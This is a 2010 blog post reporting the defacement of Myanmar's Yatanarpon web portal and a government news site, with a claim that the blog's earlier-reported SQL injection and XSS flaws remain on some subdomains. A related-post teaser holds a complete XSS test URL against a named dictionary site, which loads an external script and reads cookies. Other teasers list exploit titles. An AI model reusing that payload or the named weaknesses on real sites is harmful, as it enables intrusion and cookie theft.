Yatanarpon Web Portal is being hacked!

Home / Hacking, News, Security / Yatanarpon Web Portal is being hacked!

November 24, 2010 PlanetCreator 0 Comments 0 tags

According to PeopleMediaVoice, Nation Web Portal of Myanmar ( Yatanarpon Web Portal) is being hacked by a hacker group named themselves “Humpty Dumpty”, defaced home page at around 12:30 AM local time yersterday, 13/11/2010.

At the same day, they hacked another gov news agency site The Mirror Online News Paper (KyayMon) http://www.kyaymon.info/.

Now, Yatanarpon Portal is currently under maintenance, and they are trying to discover their site!

Wat i wana talk is, they are not care security in their web site, We informed XSS, SQL Injection, Bypass Login from Myanmar Web Portal last month http://www.planetcreator.net/2010/10/critical-sql-injection-in-yatanarpon-web-portal/ . I know they fixed some vul but not at all.

Now, security vulnerability are still existing in some sub domain of Yatnarpon Web Portal, such as http://job.yatnarpon.com.mm and so on…

If you want to see detail of this vulnerability Click Here (Note :- Registered Member Only- If you are not PlanetCreator.Net Member Sign up Here)

We hope that your security staff will look into this issue and fix it as soon as possible.

Explore More

critical XSS Vulnerability on Ayar Myanmar-English Dictionary

PlanetCreator has reported another critical XSS Vulnerability on Ayar Myanmar – English Dictionary Website :Â Â Â Owned by Ayar Myanmar Unicode Group. Test XSS : http://myanmardictionary.co.cc/feedback.php?page=1&q=%27%22%3E%3C%2Ftitle%3E%3Cscript%20src=http://www.planetcreator.net/attacking/xss/planetcreator-xss.js%3Ealert%28document.cookie%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+PlanetCreator%3C%2Fh1%3E%3C%2Fmarquee%3E This vulnerability has been alerted

Login Bypass vulnerability of Myanmar Sites (Fixed)

Last week PlanetCreator informed Security Weakness of Myanmar Uready http://www.myanmaruready.com/ and Su Aung Phyo Co., Ltd. http://www.suaungphyo.com to their webmaster and fixed as long as we reported. SQL injection is

Introducing SpearPhisher – A Simple Phishing Email Generation Tool

SpearPhisher is a simple point and click Windows GUI tool designed for (mostly) non-technical people who would like to supplement the education and awareness aspect of their information security program.

[webapps] OpenEMR 7.0.2 - Arbitrary File Read
on June 8, 2026 at 12:00 am
OpenEMR 7.0.2 - Arbitrary File Read
[webapps] WordPress Contest Gallery 28.1.4 - Unauthenticated Blind SQL Injection
on June 5, 2026 at 12:00 am
WordPress Contest Gallery 28.1.4 - Unauthenticated Blind SQL Injection
[webapps] WordPress OrderConvo 14 - Path Traversal
on June 1, 2026 at 12:00 am
WordPress OrderConvo 14 - Path Traversal
[webapps] Drupal Core 10.5.5 - Error-Based SQL Injection
on June 1, 2026 at 12:00 am
Drupal Core 10.5.5 - Error-Based SQL Injection
[webapps] YAMCS yamcs-core 5.12.7 - LDAP Injection
on May 30, 2026 at 12:00 am
YAMCS yamcs-core 5.12.7 - LDAP Injection